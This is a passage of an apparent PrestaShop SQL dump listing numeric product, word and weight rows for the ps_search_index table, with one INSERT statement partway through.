(57, 783, 1),
(57, 784, 1),
(57, 785, 1),
(57, 786, 1),
(57, 787, 1),
(57, 788, 1),
(57, 789, 1),
(57, 790, 1),
(57, 791, 1),
(57, 792, 1),
(57, 793, 1),
(57, 794, 1),
(57, 796, 1),
(57, 798, 1),
(57, 799, 1),
(57, 800, 1),
(57, 801, 1),
(57, 802, 1),
(57, 803, 1),
(57, 804, 1),
(57, 805, 1),
(57, 806, 1),
(57, 807, 1),
(57, 808, 1),
(57, 809, 1),
(57, 810, 1),
(57, 811, 1),
(57, 812, 1),
(57, 813, 1),
(57, 814, 1),
(57, 1032, 1),
(57, 1271, 1),
(57, 1300, 1),
(57, 1301, 1),
(57, 1381, 1),
(57, 1890, 1),
(57, 2298, 1),
(57, 2306, 1),
(57, 2569, 1),
(57, 2948, 1),
(57, 3550, 1),
(57, 3551, 1),
(57, 3552, 1),
(57, 3553, 1),
(57, 3554, 1),
(57, 3555, 1),
(57, 3556, 1),
(57, 3557, 1),
(57, 3558, 1),
(57, 3559, 1),
(57, 3560, 1),
(57, 3561, 1),
(57, 3562, 1),
(57, 3563, 1),
(57, 3564, 1),
(57, 3566, 1),
(57, 3567, 1),
(57, 3568, 1),
(57, 3569, 1),
(57, 3570, 1),
(57, 3571, 1),
(57, 3572, 1),
(57, 3573, 1),
(57, 3574, 1),
(57, 3575, 1),
(57, 4027, 1),
(57, 4043, 1),
(57, 8999, 1),
(57, 9000, 1),
(57, 9001, 1),
(57, 9003, 1),
(57, 9004, 1),
(57, 9005, 1),
(57, 9006, 1),
(57, 9007, 1),
(57, 9008, 1),
(57, 9123, 1),
(57, 14220, 1),
(57, 14230, 1),
(57, 15495, 1),
(57, 16407, 1),
(57, 16408, 1),
(57, 16409, 1),
(57, 16410, 1),
(57, 16411, 1),
(57, 16412, 1),
(57, 16413, 1),
(57, 16416, 1),
(57, 16417, 1),
(57, 16418, 1),
(57, 16419, 1),
(57, 16420, 1),
(57, 16421, 1),
(57, 17101, 1),
(57, 45184, 1),
(57, 45185, 1),
(57, 45231, 1),
(57, 45232, 1),
(57, 797, 2),
(57, 816, 2),
(57, 817, 2),
(57, 818, 2),
(57, 819, 2),
(57, 820, 2),
(57, 821, 2),
(57, 822, 2),
(57, 823, 2),
(57, 824, 2),
(57, 825, 2),
(57, 826, 2),
(57, 827, 2),
(57, 828, 2),
(57, 829, 2),
(57, 3565, 2),
(57, 3577, 2),
(57, 3579, 2),
(57, 3580, 2),
(57, 3581, 2),
(57, 3582, 2),
(57, 3583, 2),
(57, 3585, 2),
(57, 3586, 2),
(57, 3587, 2),
(57, 3588, 2),
(57, 3589, 2),
(57, 795, 3),
(57, 830, 3),
(57, 3578, 3),
(57, 3584, 3),
(57, 3590, 3),
(57, 772, 6),
(57, 774, 6),
(57, 1270, 6),
(57, 1371, 6),
(57, 3546, 6),
(57, 3547, 6),
(57, 3848, 6),
(57, 5226, 6),
(57, 771, 7),
(57, 3545, 7),
(57, 773, 9),
(57, 3548, 9),
(59, 778, 1),
(59, 791, 1),
(59, 797, 1),
(59, 802, 1),
(59, 803, 1),
(59, 804, 1),
(59, 1029, 1),
(59, 1030, 1),
(59, 1031, 1),
(59, 1033, 1),
(59, 1034, 1),
(59, 1039, 1),
(59, 1271, 1),
(59, 1305, 1),
(59, 1381, 1),
(59, 1383, 1),
(59, 1384, 1),
(59, 1385, 1),
(59, 1386, 1),
(59, 1387, 1),
(59, 1388, 1),
(59, 1389, 1),
(59, 1390, 1),
(59, 1391, 1),
(59, 1396, 1),
(59, 1746, 1),
(59, 1890, 1),
(59, 2298, 1),
(59, 2306, 1),
(59, 2569, 1),
(59, 2948, 1),
(59, 3565, 1),
(59, 3568, 1),
(59, 3570, 1),
(59, 3571, 1),
(59, 3578, 1),
(59, 3584, 1),
(59, 4475, 1),
(59, 4476, 1),
(59, 4477, 1),
(59, 8999, 1),
(59, 9000, 1),
(59, 9001, 1),
(59, 9003, 1),
(59, 9004, 1),
(59, 9005, 1),
(59, 9007, 1),
(59, 9008, 1),
(59, 9805, 1),
(59, 14220, 1),
(59, 14230, 1),
(59, 14704, 1),
(59, 14938, 1),
(59, 14939, 1),
(59, 14941, 1),
(59, 15495, 1),
(59, 16023, 1),
(59, 16113, 1),
(59, 16114, 1),
(59, 16115, 1),
(59, 16116, 1),
(59, 16117, 1),
(59, 16118, 1),
(59, 16119, 1),
(59, 16120, 1),
(59, 16407, 1),
(59, 16408, 1),
(59, 16409, 1),
(59, 16410, 1),
(59, 16411, 1),
(59, 16412, 1),
(59, 16413, 1),
(59, 16416, 1),
(59, 16417, 1),
(59, 16419, 1),
(59, 16420, 1),
(59, 16421, 1),
(59, 17345, 1),
(59, 45184, 1),
(59, 45185, 1),
(59, 45231, 1),
(59, 45232, 1),
(59, 1032, 2),
(59, 1035, 2),
(59, 1036, 2),
(59, 1037, 2),
(59, 830, 3),
(59, 3590, 3),
(59, 772, 6),
(59, 1012, 6),
(59, 1270, 6),
(59, 1371, 6),
(59, 3546, 6),
(59, 3848, 6),
(59, 5226, 6),
(59, 14707, 6),
(59, 773, 7),
(59, 1374, 7),
(59, 3548, 7),
(59, 4458, 7),
(60, 778, 1),
(60, 791, 1),
(60, 797, 1),
(60, 802, 1),
(60, 803, 1),
(60, 804, 1),
(60, 1015, 1),
(60, 1029, 1),
(60, 1030, 1),
(60, 1031, 1),
(60, 1033, 1),
(60, 1034, 1),
(60, 1039, 1),
(60, 1271, 1),
(60, 1305, 1),
(60, 1373, 1),
(60, 1382, 1),
(60, 1383, 1),
(60, 1384, 1),
(60, 1385, 1),
(60, 1386, 1),
(60, 1387, 1),
(60, 1388, 1),
(60, 1389, 1),
(60, 1390, 1),
(60, 1391, 1),
(60, 1396, 1),
(60, 1746, 1),
(60, 1890, 1),
(60, 2298, 1),
(60, 2306, 1),
(60, 2569, 1),
(60, 2948, 1),
(60, 3555, 1),
(60, 3557, 1),
(60, 3565, 1),
(60, 3571, 1),
(60, 6562, 1),
(60, 8999, 1),
(60, 9000, 1),
(60, 9001, 1),
(60, 9003, 1),
(60, 9004, 1),
(60, 9005, 1),
(60, 9007, 1),
(60, 9008, 1),
(60, 10307, 1),
(60, 14230, 1),
(60, 14701, 1),
(60, 14702, 1),
(60, 14707, 1),
(60, 14817, 1),
(60, 14825, 1),
(60, 14935, 1),
(60, 14936, 1),
(60, 14937, 1),
(60, 14938, 1),
(60, 14939, 1),
(60, 14940, 1),
(60, 14941, 1),
(60, 14942, 1),
(60, 15495, 1),
(60, 16407, 1),
(60, 16408, 1),
(60, 16409, 1),
(60, 16410, 1),
(60, 16411, 1),
(60, 16412, 1),
(60, 16413, 1),
(60, 16416, 1),
(60, 16417, 1),
(60, 16419, 1),
(60, 16420, 1),
(60, 16421, 1),
(60, 17458, 1),
(60, 45184, 1),
(60, 45185, 1),
(60, 45231, 1),
(60, 45232, 1),
(60, 795, 2),
(60, 816, 2),
(60, 817, 2),
(60, 818, 2),
(60, 819, 2),
(60, 820, 2),
(60, 821, 2),
(60, 822, 2),
(60, 823, 2),
(60, 825, 2),
(60, 826, 2),
(60, 827, 2),
(60, 828, 2),
(60, 829, 2),
(60, 1032, 2),
(60, 1035, 2),
(60, 1036, 2),
(60, 1037, 2),
(60, 1047, 2),
(60, 1381, 2),
(60, 1747, 2),
(60, 3577, 2),
(60, 3579, 2),
(60, 3580, 2),
(60, 3582, 2),
(60, 3587, 2),
(60, 3589, 2),
(60, 4475, 2),
(60, 4476, 2),
(60, 4477, 2),
(60, 6680, 2),
(60, 10223, 2),
(60, 10224, 2),
(60, 10225, 2),
(60, 10226, 2),
(60, 10227, 2),
(60, 10228, 2),
(60, 14220, 2),
(60, 830, 3),
(60, 3548, 3),
(60, 3578, 3),
(60, 3584, 3),
(60, 3590, 3),
(60, 772, 6),
(60, 1012, 6),
(60, 1013, 6),
(60, 1371, 6),
(60, 3546, 6),
(60, 3849, 6),
(60, 4172, 6),
(60, 5226, 6),
(60, 5229, 6),
(60, 1374, 7),
(60, 4458, 7),
(60, 773, 9),
(61, 778, 1),
(61, 793, 1),
(61, 798, 1),
(61, 1029, 1),
(61, 1032, 1),
(61, 1271, 1),
(61, 1298, 1),
(61, 1381, 1),
(61, 1393, 1),
(61, 1889, 1),
(61, 1890, 1),
(61, 2298, 1),
(61, 2306, 1),
(61, 2569, 1),
(61, 2937, 1),
(61, 2948, 1),
(61, 3562, 1),
(61, 3563, 1),
(61, 3564, 1),
(61, 3992, 1),
(61, 3993, 1),
(61, 3994, 1),
(61, 3995, 1),
(61, 3996, 1),
(61, 3997, 1),
(61, 3998, 1),
(61, 3999, 1),
(61, 4000, 1),
(61, 4001, 1),
(61, 4002, 1),
(61, 4003, 1),
(61, 4004, 1),
(61, 4005, 1),
(61, 4006, 1),
(61, 4036, 1),
(61, 4043, 1),
(61, 8999, 1),
(61, 9000, 1),
(61, 9001, 1),
(61, 9003, 1),
(61, 9004, 1),
(61, 9005, 1),
(61, 9006, 1),
(61, 9007, 1),
(61, 9008, 1),
(61, 9377, 1),
(61, 14220, 1),
(61, 14230, 1),
(61, 14942, 1),
(61, 15495, 1),
(61, 15791, 1),
(61, 15792, 1),
(61, 15793, 1),
(61, 15794, 1),
(61, 15795, 1),
(61, 15796, 1),
(61, 15797, 1),
(61, 15798, 1),
(61, 15799, 1),
(61, 15800, 1),
(61, 15801, 1),
(61, 15802, 1),
(61, 15803, 1),
(61, 15804, 1),
(61, 16407, 1),
(61, 16408, 1),
(61, 16409, 1),
(61, 16410, 1),
(61, 16411, 1),
(61, 16412, 1),
(61, 16413, 1),
(61, 16414, 1),
(61, 16415, 1),
(61, 16416, 1),
(61, 16417, 1),
(61, 16418, 1),
(61, 16419, 1),
(61, 16420, 1),
(61, 16421, 1),
(61, 45184, 1),
(61, 45185, 1),
(61, 45231, 1),
(61, 45232, 1),
(61, 797, 2),
(61, 816, 2),
(61, 817, 2),
(61, 818, 2),
(61, 819, 2),
(61, 820, 2),
(61, 821, 2),
(61, 822, 2),
(61, 823, 2),
(61, 824, 2),
(61, 825, 2),
(61, 826, 2),
(61, 827, 2),
(61, 828, 2),
(61, 829, 2),
(61, 1300, 2),
(61, 1301, 2),
(61, 3565, 2),
(61, 3577, 2),
(61, 3579, 2),
(61, 3580, 2),
(61, 3581, 2),
(61, 3582, 2),
(61, 3583, 2),
(61, 3584, 2),
(61, 3585, 2),
(61, 3586, 2),
(61, 3587, 2),
(61, 3588, 2),
(61, 3589, 2),
(61, 4027, 2),
(61, 795, 3),
(61, 830, 3),
(61, 3578, 3),
(61, 3590, 3),
(61, 772, 6),
(61, 3546, 6);
INSERT INTO `ps_search_index` (`id_product`, `id_word`, `weight`) VALUES
(61, 3991, 6),
(61, 4024, 6),
(61, 32738, 6),
(61, 32803, 6),
(61, 774, 7),
(61, 1270, 7),
(61, 3547, 7),
(61, 3848, 7),
(61, 773, 9),
(61, 3548, 9),
(62, 776, 1),
(62, 777, 1),
(62, 778, 1),
(62, 779, 1),
(62, 780, 1),
(62, 781, 1),
(62, 782, 1),
(62, 783, 1),
(62, 784, 1),
(62, 785, 1),
(62, 786, 1),
(62, 787, 1),
(62, 788, 1),
(62, 789, 1),
(62, 790, 1),
(62, 791, 1),
(62, 792, 1),
(62, 793, 1),
(62, 794, 1),
(62, 796, 1),
(62, 798, 1),
(62, 799, 1),
(62, 800, 1),
(62, 801, 1),
(62, 802, 1),
(62, 803, 1),
(62, 804, 1),
(62, 805, 1),
(62, 806, 1),
(62, 807, 1),
(62, 808, 1),
(62, 809, 1),
(62, 810, 1),
(62, 811, 1),
(62, 812, 1),
(62, 813, 1),
(62, 814, 1),
(62, 1032, 1),
(62, 1271, 1),
(62, 1300, 1),
(62, 1301, 1),
(62, 1381, 1),
(62, 1890, 1),
(62, 2298, 1),
(62, 2306, 1),
(62, 2569, 1),
(62, 2948, 1),
(62, 3550, 1),
(62, 3551, 1),
(62, 3552, 1),
(62, 3553, 1),
(62, 3554, 1),
(62, 3555, 1),
(62, 3556, 1),
(62, 3557, 1),
(62, 3558, 1),
(62, 3559, 1),
(62, 3560, 1),
(62, 3561, 1),
(62, 3562, 1),
(62, 3563, 1),
(62, 3564, 1),
(62, 3566, 1),
(62, 3567, 1),
(62, 3568, 1),
(62, 3569, 1),
(62, 3570, 1),
(62, 3571, 1),
(62, 3572, 1),
(62, 3573, 1),
(62, 3574, 1),
(62, 3575, 1),
(62, 4027, 1),
(62, 4043, 1),
(62, 8999, 1),
(62, 9000, 1),
(62, 9001, 1),
(62, 9003, 1),
(62, 9004, 1),
(62, 9005, 1),
(62, 9006, 1),
(62, 9007, 1),
(62, 9008, 1),
(62, 9123, 1),
(62, 14220, 1),
(62, 14230, 1),
(62, 15495, 1),
(62, 16407, 1),
(62, 16408, 1),
(62, 16409, 1),
(62, 16410, 1),
(62, 16411, 1),
(62, 16412, 1),
(62, 16413, 1),
(62, 16416, 1),
(62, 16417, 1),
(62, 16418, 1),
(62, 16419, 1),
(62, 16420, 1),
(62, 16421, 1),
(62, 17101, 1),
(62, 55590, 1),
(62, 55591, 1),
(62, 55821, 1),
(62, 55822, 1),
(62, 797, 2),
(62, 816, 2),
(62, 817, 2),
(62, 818, 2),
(62, 819, 2),
(62, 820, 2),
(62, 821, 2),
(62, 822, 2),
(62, 823, 2),
(62, 824, 2),
(62, 825, 2),
(62, 826, 2),
(62, 827, 2),
(62, 828, 2),
(62, 829, 2),
(62, 3565, 2),
(62, 3577, 2),
(62, 3579, 2),
(62, 3580, 2),
(62, 3581, 2),
(62, 3582, 2),
(62, 3583, 2),
(62, 3585, 2),
(62, 3586, 2),
(62, 3587, 2),
(62, 3588, 2),
(62, 3589, 2),
(62, 795, 3),
(62, 830, 3),
(62, 3578, 3),
(62, 3584, 3),
(62, 3590, 3),
(62, 772, 6),
(62, 774, 6),
(62, 1270, 6),
(62, 3546, 6),
(62, 3547, 6),
(62, 3848, 6),
(62, 32738, 6),
(62, 32803, 6),
(62, 771, 7),
(62, 3545, 7),
(62, 773, 9),
(62, 3548, 9),
(63, 778, 1),
(63, 791, 1),
(63, 797, 1),
(63, 802, 1),
(63, 803, 1),
(63, 804, 1),
(63, 1029, 1),
(63, 1030, 1),
(63, 1031, 1),
(63, 1033, 1),
(63, 1034, 1),
(63, 1039, 1),
(63, 1271, 1),
(63, 1305, 1),
(63, 1381, 1),
(63, 1383, 1),
(63, 1384, 1),
(63, 1385, 1),
(63, 1386, 1),
(63, 1387, 1),
(63, 1388, 1),
(63, 1389, 1),
(63, 1390, 1),
(63, 1391, 1),
(63, 1396, 1),
(63, 1746, 1),
(63, 1890, 1),
(63, 2298, 1),
(63, 2306, 1),
(63, 2569, 1),
(63, 2948, 1),
(63, 3565, 1),
(63, 3568, 1),
(63, 3570, 1),
(63, 3571, 1),
(63, 3578, 1),
(63, 3584, 1),
(63, 4475, 1),
(63, 4476, 1),
(63, 4477, 1),
(63, 8999, 1),
(63, 9000, 1),
(63, 9001, 1),
(63, 9003, 1),
(63, 9004, 1),
(63, 9005, 1),
(63, 9007, 1),
(63, 9008, 1),
(63, 9805, 1),
(63, 14220, 1),
(63, 14230, 1),
(63, 14704, 1),
(63, 14938, 1),
(63, 14939, 1),
(63, 14941, 1),
(63, 15495, 1),
(63, 16023, 1),
(63, 16113, 1),
(63, 16114, 1),
(63, 16115, 1),
(63, 16116, 1),
(63, 16117, 1),
(63, 16118, 1),
(63, 16119, 1),
(63, 16120, 1),
(63, 16407, 1),
(63, 16408, 1),
(63, 16409, 1),
(63, 16410, 1),
(63, 16411, 1),
(63, 16412, 1),
(63, 16413, 1),
(63, 16416, 1),
(63, 16417, 1),
(63, 16419, 1),
(63, 16420, 1),
(63, 16421, 1),
(63, 17345, 1),
(63, 45184, 1),
(63, 45185, 1),
(63, 45231, 1),
(63, 45232, 1),
(63, 1032, 2),
(63, 1035, 2),
(63, 1036, 2),
(63, 1037, 2),
(63, 830, 3),
(63, 3590, 3),
(63, 772, 6),
(63, 1012, 6),
(63, 1270, 6),
(63, 3546, 6),
(63, 3848, 6),
(63, 14707, 6),
(63, 32738, 6),
(63, 32803, 6),
(63, 773, 7),
(63, 1374, 7),
(63, 3548, 7),
(63, 4458, 7),
(64, 778, 1),
(64, 791, 1),
(64, 797, 1),
(64, 802, 1),
(64, 803, 1),
(64, 804, 1),
(64, 1015, 1),
(64, 1029, 1),
(64, 1030, 1),
(64, 1031, 1),
(64, 1033, 1),
(64, 1034, 1),
(64, 1039, 1),
(64, 1271, 1),
(64, 1305, 1),
(64, 1373, 1),
(64, 1382, 1),
(64, 1383, 1),
(64, 1384, 1),
(64, 1385, 1),
(64, 1386, 1),
(64, 1387, 1),
(64, 1388, 1),
(64, 1389, 1),
(64, 1390, 1),
(64, 1391, 1),
(64, 1396, 1),
(64, 1746, 1),
(64, 1890, 1),
(64, 2298, 1),
(64, 2306, 1),
(64, 2569, 1),
(64, 2948, 1),
(64, 3555, 1),
(64, 3557, 1),
(64, 3565, 1),
(64, 3571, 1),
(64, 6562, 1),
(64, 8999, 1),
(64, 9000, 1),
(64, 9001, 1),
(64, 9003, 1),
(64, 9004, 1),
(64, 9005, 1),
(64, 9007, 1),
(64, 9008, 1),
(64, 10307, 1),
(64, 14230, 1),
(64, 14701, 1),
(64, 14702, 1),
(64, 14707, 1),
(64, 14817, 1),
(64, 14825, 1),
(64, 14935, 1),
(64, 14936, 1),
(64, 14937, 1),
(64, 14938, 1),
(64, 14939, 1),
(64, 14940, 1),
(64, 14941, 1),
(64, 14942, 1),
(64, 15495, 1),
(64, 16407, 1),
(64, 16408, 1),
(64, 16409, 1),
(64, 16410, 1),
(64, 16411, 1),
(64, 16412, 1),
(64, 16413, 1),
(64, 16416, 1),
(64, 16417, 1),
(64, 16419, 1),
(64, 16420, 1),
(64, 16421, 1),
(64, 17458, 1),
(64, 45184, 1),
(64, 45185, 1),
(64, 45231, 1),
(64, 45232, 1),
(64, 795, 2),
(64, 816, 2),
(64, 817, 2),
(64, 818, 2),
(64, 819, 2),
(64, 820, 2),
(64, 821, 2),
(64, 822, 2),
(64, 823, 2),
(64, 825, 2),
(64, 826, 2),
(64, 827, 2),
(64, 828, 2),
(64, 829, 2),
(64, 1032, 2),
(64, 1035, 2),
(64, 1036, 2),
(64, 1037, 2),
(64, 1047, 2),
(64, 1381, 2),
(64, 1747, 2),
(64, 3577, 2),
(64, 3579, 2),
(64, 3580, 2),
(64, 3582, 2),
(64, 3587, 2),
(64, 3589, 2),
(64, 4475, 2),
(64, 4476, 2),
(64, 4477, 2),
(64, 6680, 2),
(64, 10223, 2),
(64, 10224, 2),
(64, 10225, 2),
(64, 10226, 2),
(64, 10227, 2),
(64, 10228, 2),
(64, 14220, 2),
(64, 830, 3),
(64, 3548, 3),
(64, 3578, 3),
(64, 3584, 3),
(64, 3590, 3),
(64, 772, 6),
(64, 1012, 6),
(64, 1013, 6),
(64, 3546, 6),
(64, 3849, 6),
(64, 4172, 6),
(64, 5229, 6),
(64, 32738, 6),
(64, 32803, 6),
(64, 1374, 7),
(64, 4458, 7),
(64, 773, 9),
(65, 34308, 1),
(65, 34309, 1),
(65, 34310, 1),
(65, 34311, 1),
(65, 774, 2),
(65, 1012, 2),
(65, 1032, 2),
(65, 1270, 2),
(65, 1879, 2),
(65, 34305, 2),
(65, 34306, 2),
(65, 34307, 2),
(65, 830, 3),
(65, 3590, 3),
(65, 34303, 6),
(65, 34304, 6),
(65, 34318, 6),
(65, 34319, 6),
(67, 793, 1),
(67, 797, 1),
(67, 805, 1),
(67, 1031, 1),
(67, 1032, 1),
(67, 1271, 1),
(67, 1274, 1),
(67, 1275, 1),
(67, 1276, 1),
(67, 1277, 1),
(67, 1278, 1),
(67, 1279, 1),
(67, 1280, 1),
(67, 1281, 1),
(67, 1282, 1),
(67, 1283, 1),
(67, 1284, 1),
(67, 1285, 1),
(67, 1286, 1),
(67, 1287, 1),
(67, 1288, 1),
(67, 1289, 1),
(67, 1290, 1),
(67, 1291, 1),
(67, 1292, 1),
(67, 1293, 1),
(67, 1294, 1),
(67, 1295, 1),
(67, 1296, 1),
(67, 1297, 1),
(67, 1298, 1),
(67, 1299, 1),
(67, 1381, 1),
(67, 1890, 1),
(67, 2306, 1),
(67, 2948, 1),
(67, 3562, 1),
(67, 3565, 1),
(67, 4027, 1),
(67, 4043, 1),
(67, 5084, 1),
(67, 5085, 1),
(67, 5086, 1),
(67, 5087, 1),
(67, 5088, 1),
(67, 5089, 1),
(67, 5091, 1),
(67, 5092, 1),
(67, 8999, 1),
(67, 9000, 1),
(67, 9001, 1),
(67, 9003, 1),
(67, 9004, 1),
(67, 9005, 1),
(67, 9006, 1),
(67, 9007, 1),
(67, 9008, 1),
(67, 9494, 1),
(67, 14220, 1),
(67, 14221, 1),
(67, 14701, 1),
(67, 14824, 1),
(67, 15049, 1),
(67, 15050, 1),
(67, 15051, 1),
(67, 15052, 1),
(67, 15053, 1),
(67, 15054, 1),
(67, 15055, 1),
(67, 15056, 1),
(67, 15057, 1),
(67, 15058, 1),
(67, 15059, 1),
(67, 15060, 1),
(67, 15061, 1),
(67, 15062, 1),
(67, 15063, 1),
(67, 15064, 1),
(67, 15065, 1),
(67, 15066, 1),
(67, 15067, 1),
(67, 16407, 1),
(67, 16408, 1),
(67, 16409, 1),
(67, 16410, 1),
(67, 16411, 1),
(67, 16412, 1),
(67, 16413, 1),
(67, 16415, 1),
(67, 16416, 1),
(67, 16417, 1),
(67, 16418, 1),
(67, 16419, 1),
(67, 16420, 1),
(67, 16538, 1),
(67, 27773, 1),
(67, 27820, 1),
(67, 37283, 1),
(67, 816, 2),
(67, 817, 2),
(67, 818, 2),
(67, 819, 2),
(67, 820, 2),
(67, 821, 2),
(67, 822, 2),
(67, 823, 2),
(67, 824, 2),
(67, 825, 2),
(67, 826, 2),
(67, 827, 2),
(67, 828, 2),
(67, 829, 2),
(67, 1300, 2),
(67, 1301, 2),
(67, 3577, 2),
(67, 3579, 2),
(67, 3580, 2),
(67, 3581, 2),
(67, 3582, 2),
(67, 3583, 2),
(67, 3584, 2),
(67, 3585, 2),
(67, 3586, 2),
(67, 3587, 2),
(67, 3588, 2),
(67, 3589, 2),
(67, 773, 3),
(67, 795, 3),
(67, 830, 3),
(67, 3578, 3),
(67, 3590, 3),
(67, 798, 6),
(67, 1269, 6),
(67, 1270, 6),
(67, 1371, 6),
(67, 3547, 6),
(67, 3564, 6),
(67, 3848, 6),
(67, 5226, 6),
(67, 11591, 6),
(67, 18265, 6),
(67, 774, 7),
(67, 3548, 9),
(69, 771, 1),
(69, 773, 1),
(69, 774, 1),
(69, 775, 1),
(69, 776, 1),
(69, 777, 1),
(69, 778, 1),
(69, 779, 1),
(69, 780, 1),
(69, 781, 1),
(69, 782, 1),
(69, 783, 1),
(69, 784, 1),
(69, 785, 1),
(69, 786, 1),
(69, 787, 1),
(69, 788, 1),
(69, 789, 1),
(69, 790, 1),
(69, 791, 1),
(69, 792, 1),
(69, 793, 1),
(69, 794, 1),
(69, 795, 1),
(69, 796, 1),
(69, 798, 1),
(69, 799, 1),
(69, 800, 1),
(69, 801, 1),
(69, 802, 1),
(69, 803, 1),
(69, 804, 1),
(69, 813, 1),
(69, 814, 1),
(69, 1012, 1),
(69, 1020, 1),
(69, 1039, 1),
(69, 1270, 1),
(69, 1271, 1),
(69, 1300, 1),
(69, 1301, 1),
(69, 1381, 1),
(69, 1879, 1),
(69, 1890, 1),
(69, 2288, 1),
(69, 2296, 1),
(69, 2298, 1),
(69, 2306, 1),
(69, 2559, 1),
(69, 2569, 1),
(69, 2948, 1),
(69, 3545, 1),
(69, 3548, 1),
(69, 3549, 1),
(69, 3550, 1),
(69, 3551, 1),
(69, 3552, 1),
(69, 3553, 1),
(69, 3554, 1),
(69, 3555, 1),
(69, 3556, 1),
(69, 3557, 1),
(69, 3558, 1),
(69, 3559, 1),
(69, 3560, 1),
(69, 3561, 1),
(69, 3562, 1),
(69, 3563, 1),
(69, 3564, 1),
(69, 3566, 1),
(69, 3567, 1),
(69, 3568, 1),
(69, 3569, 1),
(69, 3570, 1),
(69, 3571, 1),
(69, 3578, 1),
(69, 3584, 1),
(69, 3848, 1),
(69, 3850, 1),
(69, 3993, 1),
(69, 4027, 1),
(69, 4043, 1),
(69, 4135, 1),
(69, 4136, 1),
(69, 4137, 1),
(69, 4138, 1),
(69, 4139, 1),
(69, 4140, 1),
(69, 4141, 1),
(69, 4142, 1),
(69, 4143, 1),
(69, 4144, 1),
(69, 4145, 1),
(69, 4146, 1),
(69, 4147, 1),
(69, 4148, 1),
(69, 4149, 1),
(69, 4150, 1),
(69, 4151, 1),
(69, 4152, 1),
(69, 4153, 1),
(69, 4154, 1),
(69, 4171, 1),
(69, 4172, 1),
(69, 4181, 1),
(69, 4193, 1),
(69, 8999, 1),
(69, 9000, 1),
(69, 9001, 1),
(69, 9003, 1),
(69, 9004, 1),
(69, 9005, 1),
(69, 9006, 1),
(69, 9007, 1),
(69, 9008, 1),
(69, 9123, 1),
(69, 14228, 1),
(69, 14230, 1),
(69, 14704, 1),
(69, 14707, 1),
(69, 15495, 1),
(69, 15905, 1),
(69, 15906, 1),
(69, 15907, 1),
(69, 15908, 1),
(69, 15909, 1),
(69, 15910, 1),
(69, 15911, 1),
(69, 15912, 1),
(69, 15913, 1),
(69, 15914, 1),
(69, 15915, 1),
(69, 15916, 1),
(69, 15917, 1),
(69, 15918, 1),
(69, 15919, 1),
(69, 15920, 1),
(69, 15921, 1),
(69, 15922, 1),
(69, 16407, 1),
(69, 16408, 1),
(69, 16409, 1),
(69, 16410, 1),
(69, 16411, 1),
(69, 16412, 1),
(69, 16413, 1),
(69, 16416, 1),
(69, 16417, 1),
(69, 16418, 1),
(69, 16419, 1),
(69, 16420, 1),
(69, 16421, 1),
(69, 17101, 1),
(69, 54873, 1),
(69, 55590, 1),
(69, 55591, 1),
(69, 55821, 1),
(69, 55822, 1),
(69, 797, 2),
(69, 1032, 2),
(69, 3565, 2),
(69, 14220, 2),
(69, 830, 3),
(69, 3590, 3),
(69, 1022, 6),
(69, 1371, 6),
(69, 1373, 6),
(69, 5226, 6),
(69, 14937, 6),
(69, 55589, 6),
(71, 773, 1),
(71, 789, 1),
(71, 791, 1),
(71, 806, 1),
(71, 807, 1),
(71, 826, 1),
(71, 1033, 1),
(71, 1381, 1),
(71, 2298, 1),
(71, 2299, 1),
(71, 2561, 1),
(71, 3994, 1),
(71, 39227, 1),
(71, 39228, 1),
(71, 55901, 1),
(71, 59545, 1),
(71, 59546, 1),
(71, 59547, 1),
(71, 59548, 1),
(71, 59549, 1),
(71, 59550, 1),
(71, 59551, 1),
(71, 59552, 1),
(71, 59553, 1),
(71, 59554, 1),
(71, 59555, 1),
(71, 59556, 1),
(71, 59557, 1),
(71, 60547, 1),
(71, 830, 3),
(71, 3590, 3),
(71, 3548, 6),
(71, 20784, 6),
(71, 788, 7),
(71, 2543, 7),
(72, 773, 1),
(72, 786, 1),
(72, 788, 1),
(72, 791, 1),
(72, 795, 1),
(72, 806, 1),
(72, 807, 1),
(72, 823, 1),
(72, 1381, 1),
(72, 1879, 1),
(72, 2296, 1),
(72, 2298, 1),
(72, 2299, 1),
(72, 2540, 1),
(72, 2543, 1),
(72, 2544, 1),
(72, 2559, 1),
(72, 2561, 1),
(72, 2937, 1),
(72, 3994, 1),
(72, 39227, 1),
(72, 39228, 1),
(72, 55901, 1),
(72, 59547, 1),
(72, 59550, 1),
(72, 59553, 1),
(72, 59554, 1),
(72, 59555, 1),
(72, 59556, 1),
(72, 59557, 1),
(72, 59716, 1),
(72, 59717, 1),
(72, 59718, 1),
(72, 59719, 1),
(72, 59720, 1),
(72, 59721, 1),
(72, 59722, 1),
(72, 59723, 1),
(72, 59724, 1),
(72, 59725, 1),
(72, 59726, 1),
(72, 59727, 1),
(72, 59728, 1),
(72, 59729, 1),
(72, 59730, 1),
(72, 59731, 1),
(72, 59732, 1),
(72, 59733, 1),
(72, 59734, 1),
(72, 59753, 1),
(72, 59754, 1),
(72, 59755, 1),
(72, 59756, 1),
(72, 59757, 1),
(72, 59758, 1),
(72, 59759, 1),
(72, 59760, 1),
(72, 59815, 1),
(72, 60890, 3),
(72, 60922, 3),
(72, 797, 6),
(72, 819, 6),
(72, 68886, 6),
(72, 3548, 9),
(73, 772, 1),
(73, 791, 1),
(73, 793, 1),
(73, 1018, 1),
(73, 1035, 1),
(73, 1036, 1),
(73, 1037, 1),
(73, 1049, 1),
(73, 1299, 1),
(73, 1381, 1),
(73, 1880, 1),
(73, 1881, 1),
(73, 1885, 1),
(73, 1889, 1),
(73, 2280, 1),
(73, 2286, 1),
(73, 2296, 1),
(73, 2298, 1),
(73, 2306, 1),
(73, 2319, 1),
(73, 2320, 1),
(73, 2569, 1),
(73, 3562, 1),
(73, 3563, 1),
(73, 4000, 1),
(73, 4141, 1),
(73, 4181, 1),
(73, 4319, 1),
(73, 4475, 1),
(73, 4476, 1),
(73, 4477, 1),
(73, 6557, 1),
(73, 6558, 1),
(73, 6855, 1),
(73, 8999, 1),
(73, 9000, 1),
(73, 9001, 1),
(73, 9003, 1),
(73, 9004, 1),
(73, 9005, 1),
(73, 9007, 1),
(73, 9008, 1),
(73, 14230, 1),
(73, 15908, 1),
(73, 16020, 1),
(73, 16408, 1),
(73, 16409, 1),
(73, 16410, 1),
(73, 16411, 1),
(73, 16412, 1),
(73, 16413, 1),
(73, 16416, 1),
(73, 16417, 1),
(73, 16419, 1),
(73, 16420, 1),
(73, 16421, 1),
(73, 59725, 1),
(73, 59753, 1),
(73, 61336, 1),
(73, 61337, 1),
(73, 61338, 1),
(73, 61339, 1),
(73, 61340, 1),
(73, 61341, 1),
(73, 61342, 1),
(73, 61343, 1),
